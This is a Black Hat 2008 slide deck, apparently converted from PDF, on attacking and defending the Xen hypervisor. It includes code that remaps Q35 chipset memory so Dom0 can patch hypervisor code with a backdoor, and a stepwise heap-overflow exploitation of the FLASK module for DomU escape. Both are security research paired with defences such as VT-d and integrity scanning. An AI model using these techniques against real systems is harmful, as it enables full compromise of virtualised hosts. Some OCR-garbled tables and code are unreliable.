# Preventing and Detecting Xen Hypervisor Subversions

Joanna Rutkowska & Rafał Wojtczuk Invisible Things Lab

Black Hat USA 2008, August 7th, Las Vegas, NV

### Xen Owning Trilogy

**Part Two** 

Previously on Xen Owning Trilogy...

# Part I: "Subverting the Xen Hypervisor" by Rafal Wojtczuk (Invisible Things Lab)

- Hypervisor attacks via DMA
  - ✓ TG3 network card "manual" attack
  - Generic attack using disk controller
- "Xen Loadable Modules" framework:)
- Hypervisor backdooring
  - √"DR" backdoor
  - √ "Foreign" backdoor

Now, in this part...

**Protecting** the (Xen) hypervisor

2 ... and how the protection fails

3 Checking (Xen) hypervisor integrity

... and challenges with integrity scanning



## Dealing with DMA attacks



Xen and VT-d



```
static int intel_iommu_domain_init(struct domain *d)
{
   1.../
       (d->domain_id == 0)
   {
        extern int xen_in_range(paddr_t start, paddr_t end);
        extern int tboot_in_range(paddr_t start, paddr_t end);
        for ( i = 0; i < max_page; i++ )
            if ( xen_in_range(i << PAGE_SHIFT_4K, (i + 1) << PAGE_SHIFT_4K) ||
                 tboot_in_range(i \ll PAGE_SHIFT_4K, (i + 1) \ll PAGE_SHIFT_4K))
                continue;
            iommu_map_page(d, i, i);
        }
        setup_dom0_devices(d);
        setup_dom0_rmrr(d);
        iommu_flush_all();
        /.../
   return 0;
```

Rafal's DMA attack (speech #1) will not work on Xen 3.3 running on Q35 chipset!



- ✓ Intel Core 2 Duo/Quad
- ✓ Up to 8GB RAM
- ✓ TPM 1.2
- Q35 Express chipset
- ✓ VT-d (IOMMU)

Intel DQ35JO motherboard: First IOMMU for desktops! (available in shops since around October 2007)

root@q35:~/xen-subvert-0.7.3 — ssh — 105×36

bash

bash

0

ssh

[root@q35 xen-subvert-0.7.3]# ∏

System hangs (VT-d prevented the attack)

So, how to get around?



Break ring3/ring0 separation?

Break VT-d protection?

None of them! :)





### **DRAM Controller Registers** (D0:F0)

### 5.1 **DRAM Controller (D0:F0)**

The DRAM Controller registers are in Device 0 (D0), Function 0 (F0).

Warning: Address locations that are not listed are considered Intel Reserved registers locations. Reads to Reserved registers may return non-zero values. Writes to reserved locations may cause system failures.

All registers that are defined in the PCI documented as such in this summary.

Register Symbol

**Address** 

implemented in this component are sim reserved/unimplemented space in the PREMAPBASE: 0x98 Table 5-1. DRAM Controller Register Address REMAPLIMIT: 0x9a

| <b></b> | <b>5</b> ,5 |                                             | $\square$            | $\mathbf{L}_{\mathbf{L}}$ |
|---------|-------------|---------------------------------------------|----------------------|---------------------------|
| 00-01h  | VID         | Vendor Identification                       |                      | XDU                       |
| 02-03h  | DID         | Device Identification                       | 29C0h                | RO                        |
| 04-05h  | PCICMD      | PCI Command                                 | 0006h                | RO, RW                    |
| 06-07h  | PCISTS      | PCI Status                                  | 0090h                | RWC, RO                   |
| 08h     | RID         | Revision Identification                     | 00h                  | RO                        |
| 09-0Bh  | CC          | Class Code                                  | 060000h              | RO                        |
| 0Dh     | MLT         | Master Latency Timer                        | 00h                  | RO                        |
| 0Eh     | HDR         | Header Type                                 | 00h                  | RO                        |
| 2C-2Dh  | SVID        | Subsystem Vendor Identification             | 0000h                | RWO                       |
| 2E-2Fh  | SID         | Subsystem Identification                    | 0000h                | RWO                       |
| 34h     | CAPPTR      | Capabilities Pointer                        | E0h                  | RO                        |
| 40-47h  | PXPEPBAR    | PCI Express Port Base Address               | 000000000<br>000000h | RW/L, RO                  |
| 48-4Fh  | MCHBAR      | (G)MCH Memory Mapped Register<br>Range Base | 000000000<br>000000h | RW/L, RO                  |
| 52-53h  | GGC         | GMCH Graphics Control Register              | 0030h                | RO, RW/L                  |
| 54-57h  | DEVEN       | Device Enable                               | 000003DBh            | RO, RW/L                  |

|                   |                    |                                             |                       | _                          |
|-------------------|--------------------|---------------------------------------------|-----------------------|----------------------------|
| Address<br>Offset | Register<br>Symbol | Register Name                               | Default<br>Value      | Access                     |
| 60-67h            | PCIEXBAR           | PCI Express Register Range Base<br>Address  | 00000000E0<br>000000h | RO, RW/L,<br>RW/L/K        |
| 68-6Fh            | DMIBAR             | Root Complex Register Range Base<br>Address | 000000000<br>000000h  | RO, RW/L                   |
| 90h               | PAM0               | Programmable Attribute Map 0                | 00h                   | RO, RW/L                   |
| 91h               | PAM1               | Programmable Attribute Map 1                | 00h                   | RO, RW/L                   |
| 92h               | PAM2               | Programmable Attribute Map 2                | 00h                   | RO, RW/L                   |
| 93h               | PAM3               | Programmable Attribute Map 3                | 00h                   | RO, RW/L                   |
| 94h               | PAM4               | Programmable Attribute Map 4                | 00h                   | RO, RW/L                   |
| 95h               | PAM5               | Programmable Attribute Map 5                | 00h                   | RO, RW/L                   |
| 96h               | PAM6               | Programmable Attribute Map 6                | 00h                   | RO, RW/L                   |
| 97h               | LAC                | Legacy Access Control                       | 00h                   | RW/L, RO,<br>RW            |
| レ:い               | , F:0)             | Remap Base Address Register                 | 03FFh                 | RO, RW/L                   |
| 9A-9Bh            | REMAPLIMIT         | Remap Limit Address Register                | 0000h                 | RO, RW/L                   |
| D:0               | , F:0)             | System Management RAM Control               | 02h                   | RO, RW/L,<br>RW,<br>RW/L/K |
| F:0)              |                    | Extended System Management RAM Control      | 38h                   | RW/L,<br>RWC, RO           |
| A0-A1h            | ТОМ                | Top of Memory                               | 0001h                 | RO, RW/L                   |
|                   |                    |                                             |                       |                            |

| (D:0   | , F:0) | System Management RAM Control          | 02h                             | RO, RW/L,<br>RW,<br>RW/L/K |
|--------|--------|----------------------------------------|---------------------------------|----------------------------|
| F:0)   |        | Extended System Management RAM Control | 38h                             | RW/L,<br>RWC, RO           |
| A0-A11 | ТОМ    | Top of Memory                          | 0001h                           | RO, RW/L                   |
| A2-A3h | TOUUD  | Top of Upper Usable Dram               | 0000h                           | RW/L                       |
| A4-A7h | GBSM   | Graphics Base of Stolen Memory         | 00000000h                       | RW/L ,RO                   |
| A8-ABh | BGSM   | Base of GTT stolen Memory              | 00000000h                       | RW/L ,RO                   |
| AC-AFh | TSEGMB | TSEG Memory Base                       | 00000000h                       | RW/L, RO                   |
| B0-B1h | TOLUD  | Top of Low Usable DRAM                 | 0010h                           | RW/L RO                    |
| C8-C9h | ERRSTS | Error Status                           | 0000h                           | RO, RWC/S                  |
| CA-CBh | ERRCMD | Error Command                          | 0000h                           | RO, RW                     |
| CC-CDh | SMICMD | SMI Command                            | 0000h                           | RO, RW                     |
| DC-DFh | SKPD   | Scratchpad Data                        | 00000000h                       | RW                         |
| E0-EAh | CAPID0 | Capability Identifier                  | 0000010000<br>0000010B0<br>009h | RO                         |

Memory Reclaiming



Applying this to Xen...



```
#define DO NI HYPERCALL PA 0x7c10bd20
u64 target phys area = DO NI HYPERCALL PA & \sim (0x10000-1);
u64 target phys area off = DO NI HYPERCALL PA & (0x10000-1);
new remap base = 0x40;
new remap limit = 0x60;
reclaim base = (u64)new remap base << 26;</pre>
reclaim limit = ((u64)new remap limit << 26) + 0x3fffffff;
reclaim sz = reclaim limit - reclaim base;
reclaim mapped to = 0xffffffff - reclaim sz;
reclaim off = target phys area - reclaim mapped to;
pci write word (dev, TOUUD OFFSET, (new remap limit+1)<<6);</pre>
pci write word (dev, REMAP BASE OFFSET, new remap base);
pci write word (dev, REMAP LIMIT OFFSET, new remap limit);
fdmem = open ("/dev/mem", O RDWR);
memmap = mmap (..., fdmem, reclaim base + reclaim off);
for (i = 0; i < sizeof (jmp rdi code); i++)
    *((unsigned char*)memmap + target phys area off + i) =
        jmp rdi code[i];
munmap (memmap, BUF SIZE);
close (fdmem);
```

Demo: modifying Xen 3.3 hypevisor from Dom0

 CO O
 root@q35:~ — ssh — 105×36

 Ø bash
 Ø bash
 Ø ssh

[root@q35 ~]# [



# This attack can also be used to modify SMM handler on the fly, without reboot!

So, whose fault it is?

### Xen's fault?

- Allowing Dom0/Driver domains to access some chipset registers might be needed for some reasons... (Really?)
- But Xen cannot know everything about the chipset registers and features!

### Chipset's fault?

- Maybe chipset should do some basic validation before remapping...
- E.g.: ensure the remapping only applies to the <TOLUD, 4GB> window. And makeTOLUD is lockable.
- But...

### **BIOS's fault?**

- But Q35 provides a locking mechanism (SM\_lock) that is supposed to lock down the remapping registers,
- Intel told us that using this lock mechanism is recommended in the Intel's BIOS Specification (\*)
- So, this seems to be the BIOS Writer's fault in the end...

<sup>(\*)</sup>This document is available only to Intel partners (i.e. BIOS vendors).

### Related attacks

- Loic Duflot (2006) jump to SMM and then to kernel from there (against OpenBSD securelevel).
   Now prevented by most BIOSes (thanks to the D\_LCK bit set).
- Sun Bing (2007) exploit TOP\_SWAP feature of some Intel chipsets to load malicious code before the BIOS locks the SMM and get your code into SMM. But this requires reboot. Now prevented by BIOSes setting the BILD lock.





# "Domain 0" Disaggregation

Driver domains







Advantage: compromise of a driver != Dom0 access

Stub domains



Usermode process that runs as root in Dom0 (Device Virtualization Model)



Now:
qemu compromises !=
Dom0 comrpomise

PyGRUB vs. PVGRUB



Runs in Dom0 with root privileges and process the PV domain image (untrusted)



Xen vs. competition?

|                                                                     | Xen 3.3                              | Hyper-V (**)                                                                  | ESX                                  |
|---------------------------------------------------------------------|--------------------------------------|-------------------------------------------------------------------------------|--------------------------------------|
| IOMMU/VT-d support?                                                 | Yes                                  | No                                                                            | ?                                    |
| Hypervisor protected from the Admin Domain (including DMA attacks)? | Yes                                  | No                                                                            | ?                                    |
| Driver domains?                                                     | Yes (drivers in unprivileged domain) | No<br>(drivers in the root domain)                                            | No?  Drivers in the hypervisor?! (*) |
| I/O Emulator placement?<br>(Device Virtualization)                  | Unprivileged Domain ("stub domains") | Unprivileged process (vmwp.exe running as NETWORK_SERVICE in the root domain) | ?                                    |
| Trusted Boot support?<br>(DRTM/SRTM)                                | Yes Xen tboot: DRTM via Intel TXT    | No                                                                            | ?                                    |

<sup>(\*)</sup> based on the VMWare's presentation by Oded Horovitz at CanSecWest, March 2008 (slide #3) (\*\*) based on the information provided by Brandon Baker (Microsoft) via email, July 2008

Ok, so does it really work?

Yes! No doubt it's a way to go!

Xen is well done!

but...

Overflows in hypervisor :0



... until Rafal looked at it:)

The FLASK bug

What is FLASK?

## FLASK

- One of the implementation of XSM
- XSM = Xen Security Modules
- XSM is supposed to fine grain control over security decisions
- XSM based on LSM (Linux Security Modules)



## FLASK is not compiled in by default into XEN

```
# Enable XSM security module. Enabling XSM requires selection of an
# XSM security module (FLASK_ENABLE or ACM_SECURITY).
XSM_ENABLE ?= n
FLASK_ENABLE ?= n
ACM_SECURITY ?= n
```

Ok, so where are the bugs?

```
static int flask_security_user(char *buf, int size)
   char *page = NULL;
   char *con, *user, *ptr;
   u32 sid, *sids;
   int length;
   char *newcon;
                                                          Passed as hypercall arguments
   int i, rc;
   u32 len, nsids;
   length = domain_has_security(current->domain, SECURITY__COMPUTE_USER);
   if ( length )
       return length;
   length = -ENOMEM;
   con = xmalloc_array(char, size+1);
   if (!con )
       return length;
   memset(con, 0, size+1);
   user = xmalloc_array(char, size+1);
   if (!user)
       goto out;
   memset(user, 0, size+1);
    length = -ENOMEM;
                                                          page buffer is always 4096 bytes big!
   page = xmalloc_bytes(PAGE_SIZE);
   if ( !page )
       goto out2;
   memset(page, 0, PAGE_SIZE);
    length = -EFAULT;
   if ( copy_from_user(page, buf, size) )
       goto out2;
   length = -EINVAL;
   if ( sscanf(page, "%s %s", con, user) != 2 )
       goto out2;
   length = security_context_to_sid(con, strlen(con)+1, &sid);
   if ( length < 0 )
       goto out2;
```

```
static int flask_security_relabel(char *buf, int size)
   char *scon, *tcon;
   u32 ssid, tsid, newsid;
   u16 tolass;
   int length;
   char *newcon;
                                                            Passed as hypercall arguments
   u32 len;
    length = domain_has_security(current->domain, SECURITY__COMPUTE_RELABEL);
   if ( length )
       return length;
    length = -ENOMEM;
   scon = xmalloc_array(char, size+1);
   if (!scon )
       return length;
   memset(scon, 0, size+1);
   tcon = xmalloc_array(char, size+1);
   if (!tcon )
       goto out;
                                                        Yes this is sscanf()! Welcome back 90's!
   memset(tcon, 0, size+1);
    length = -EINVAL;
   if ( sscanf(buf, "%s %s %hu", scon, tcon, &tclass) != 3 )
       goto out2;
    length = security_context_to_sid(scon, strlen(scon)+1, &ssid);
    if ( length < 0 )
       goto out2;
    length = security_context_to_sid(tcon, strlen(tcon)+1, &tsid);
    if ( length < 0 )
       goto out2;
    length = security_change_sid(ssid, tsid, tclass, &newsid);
   if ( length < 0 )
       goto out2;
    length = security_sid_to_context(newsid, &newcon, &len);
   if ( length < 0 )
       goto out2;
```

So, how do we exploit it?

```
struct xmalloc hdr
    size t size;
    struct list head freelist;
} cacheline aligned;
struct list head {
    struct list head *next, *prev;
};
```

Step I: flask\_user (buf, 8192)

We set: buf [8192-hdr\_sz]=999
Then buf overwrites page...
... and user hdr's size field gets a new value!

the *user* buffer (8k)

xmalloc hdr

size = 999

the page buffer (4k)

xmalloc hdr

higher addresses

After freeing buf xmalloc will put it on a list of small free chunks and use for the next allocation of a small chunk!

"Small" chunks: chunks for buffers that are less then 4096 bytes

Step 2: flask\_relabel (buf, 8192)

xenoprof

xmalloc\_hdr

the *tcon* buffer (8k)

xmalloc\_hdr

... so if we write addr there, then...

we will get (long) 0 written at addr:)

Step 3: freeing xenoprof buffer

xenoprof\_enable\_virq();

## What we got? A write-zero-to-arbitrary-address primitive

## What to overwrite with zero? How about the upper half of some hypercall address? This way we will redirect it to usermode!

Demo: Escape from DomU using the FLASK bug

```
_ 🗆 ×
[root@dom0 ~]#
                                                           _ 🗆 ×
           xen_printk("All your hypervisor are belong to us !\n");
           return Oxaabbccdd;
     [root@some_domU flask-bo]#
```

#### The bug has been patched on July 21st, 2008:

changeset: 18096:fa66b33f975a

user: Keir Fraser < keir.fraser@citrix.com>

date: Mon Jul 21 09:41:36 2008 +0100

summary: [XSM][FLASK] Argument handling bugs in XSM:FLASK

BTW, note the lack of the "security" word in the patch description;)



Can we get rid of all bugs in the hypervisor?

Xen hypervisor complexity

#### Lines-of-Code in Xen 3 hypervisors in ring 0 (\*)



<sup>\*</sup>Calculated using: find xen/ -name "\*.[chsS]" -print0 | xargs -0 cat | wc -1 \*\*Retrieved from the Xen unstable mercurial on July 24th, 2008

Trend a bit disturbing...

Xen hypervisor grows over time, instead of shrinking:(



<sup>(\*)</sup> based on the information provided by Brandon Baker (Microsoft) via email, July 2008

Lessons learnt

- Hypervisors are not special!
- Hypervisor can be compromised too!
- Computer systems are complex!
- Prevention is not enough!

Prevention not enough!



Ensuring Hypervisor Integrity

Integrity Scanning

### Integrity Scanning

Ensure the hypervisor's code & data are intact

Ensure no untrusted code in hypervisor

hypervisor code data data data data

Code is easy to verify...

... but data is not!



Executable page with untrusted code



- I. Read hypervisor's CR3
- 2. Parse Page Tables and find all pages that are marked as executable and supervisor in their PTEs
- 3. Verify the hashes of those code pages remain the same as during the initialization phase
- 4. Also: ensure some system wide registers were not modified (CR4, CR0, etc)

To make it work...

- Hypervisor must strictly apply the NX bit (only code pages do not have NX bit set)
- No self-modifying code in the hypervisor
- Hypervisor's code not pageable

## Xen hypervisor can meet those requirements with just few cosmetic workarounds

Hyper-Valready meets all those requirements! (Brandon Baker, Microsoft) ... but, there are traps!

Trap #1
Rootkit might keep its code in the usermode pages - CPU would still execute them from ring0...



CPU should refuse to execute code from usermode pages when running in ring0

Marketing name: "NX+" or "XD+":)

Talks with Intel in progress...

## Trap #2 Code-less backdoors! 'jmp rdi' or more advanced ret-into-libc stuff (don't think ret-into-libc not possible on x64!)



Anybody who can issue INT XX can now get their code executed in ring0 in the hypervisor!

There only few structures (function pointers) that could be used to plant such backdoor!

This is few comparing with lots of if we were to check all possible function pointers

Examples for Xen: IDT, hypercall\_table, exception\_table

Hypervisor should provide a sanity function that would be part of the code (static path) that would check those few structures.

HyperGuard doesn't need to know about those few structures.

# Trap #3 We only check integrity at the very moment... when we check integrity... What happens in between? When should we do the checks?



#### Solution?

Oh, come on, we need to leave a few aces up in our sleeves ;)

Introducing HyperGuard...

## HyperGuard is a project done in cooperation with Phoenix Technologies

#### Phoenix BIOS



Why in SMM?

|                                      | SMM<br>handler                                                   | PCI device                                      | Chipset                         |
|--------------------------------------|------------------------------------------------------------------|-------------------------------------------------|---------------------------------|
| tamper<br>proof?                     | should be:) (depends very much on the BIOS see the Q35 bug)  yes |                                                 | yes                             |
| access to CPU state (e.g. registers) | yes                                                              | no                                              | no                              |
| reliable<br>access to<br>DRAM        | yes                                                              | no<br>(e.g. IOMMU, other<br>redirecting tricks) | yes<br>(can deal with<br>IOMMU) |

Combining chipset-based scanner (see Yuriy Bulygin's presentation) with SMM-based scanner seems like a good mixture...



## CHIPSET BASED APPROACH TO DETECT VIRTUALIZATION MALWARE a.k.a. DeepWatch

Yuriy Bulygin

Joint work with David Samyde

Security Center of Excellence / PSIRT @ Intel Corporation



Combining SMM + chipset integrity scanning

|                                      | SMM<br>handler | PCI<br>device | Chipset | SMM +<br>chipset |
|--------------------------------------|----------------|---------------|---------|------------------|
| tamper<br>proof?                     | should be :)   | yes           | yes     | yes              |
| access to CPU state (e.g. registers) | yes            | no            | no      | yes              |
| reliable<br>access to<br>DRAM        | yes            | no            | yes     | yes              |

## Additionally chipset could provide fast hash calculation service to the HyperGuard

But we should keep the chipset based scanner as simple as possible!

The deeper we are the simpler we are!

Talks with Intel in progress...

HyperGuard might also be used in the future to verify integrity of normal OS kernels (e.g. Windows or Linux)

## Slides available at: <a href="http://invisiblethingslab.com/bh08">http://invisiblethingslab.com/bh08</a>

Demos and code will be available from the same address after Intel releases the patch.

## Credits

 Brandon Baker (Microsoft), for providing lots of information about Hyper-V (that we haven't played with ourselves yet)

### Thank you!

Xen Owning Trilogy to be continued in:

"Bluepilling The Xen Hypervisor"

by Invisible Things Lab